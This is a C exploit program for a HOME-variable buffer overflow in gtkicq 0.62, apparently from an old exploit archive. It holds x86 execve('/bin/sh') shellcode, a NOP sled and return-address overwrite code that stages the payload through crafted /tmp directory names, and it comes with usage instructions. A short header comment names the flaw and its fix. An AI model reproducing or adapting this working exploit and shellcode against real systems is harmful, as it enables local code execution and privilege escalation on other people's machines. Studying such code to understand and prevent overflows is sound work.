0008-exploits/gtkicq.c

/**
*** gtkicq-0.62 sploit
*** sebastien.roy@epitech.net
***
*** overflow : "HOME" environment variable
*** from file : util.c & rcfile.c
*** patch : exchange all strcpy by strncpy ;)
*** - don't trust environment variable
*** launch a shell.
***
*** Usage : ./a.out [offset]
*** then run gtkicq
**/

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define NOP     '\x90'
#define OFFSET  256

char shellcode[] =
  "\xeb\x1f"              /* jmp <end>            */
                          /* <start>:             */
  "\x5e"                  /* pop %esi             */
  "\x31\xc0"              /* xor %eax,%eax        */
  "\x88\x46\x07"          /* mov %al,0x7(%esi)    */
  "\x89\x76\x08"          /* mov %esi,0x8(%esi)   */
  "\x89\x46\x0c"          /* mov %eax,0xc(%esi)   */
  "\xb0\x0b"              /* mov $0xb,%al         */
  "\x89\xf3"              /* mov %esi,%ebx        */
  "\x8d\x4e\x08"          /* lea 0x8(%esi),%ecx   */
  "\x8d\x56\x0c"          /* lea 0xc(%esi),%edx   */
  "\xcd\x80"              /* int $0x80            */
  "\x31\xdb"              /* xor %ebx,%ebx        */
  "\x31\xc0"              /* xor %eax,%eax        */
  "\x40"                  /* inc %eax             */
  "\xcd\x80"              /* int $0x80            */
                          /* <end>:               */
  "\xe8\xdc\xff\xff\xff"; /* call 804819d <start> */

unsigned long   get_sp()
{
  asm("movl %esp, %eax");
}

extern char     **environ;

int     main(int argc, char **argv)
{
  unsigned long  *lptr;
  unsigned long retaddr;
  char           *str;
  char           home[300];
  int            i;
  int            offset;
  char           *cmd[2];

  bzero(home, 300);
  strcpy(home, "/tmp/X");
  for(i = 6; i < 211; i++)
    home[i] = NOP;
  strcat(home, shellcode);
  mkdir(home, 0755);
  strcat(home, "/bin");
  mkdir(home, 0755);
  strcat(home, "/sh");
  mkdir(home, 0755);
  if(argc > 1)
    offset = atoi(argv[1]);
  else
    offset = OFFSET;
  retaddr = get_sp() - offset;
  lptr = (unsigned long *) &home[256];
  *lptr = retaddr;
  lptr = (unsigned long *) &home[260];
  *lptr = retaddr;
  mkdir(home, 0755);
  setenv("HOME", home, 1);
  strcat(home, "/.icq");
  mkdir(home, 0755);
  strcat(home, "/gtkicqrc");
  i = open(home, O_CREAT|O_WRONLY, 0644);
  close(i);
  cmd[0] = "/bin/sh";
  cmd[1] = 0;
  puts("run gtkicq from this shell.");
  execve(cmd[0], cmd, environ);
  return 0;
}
/*                    www.hack.co.za           [7 August 2000]*/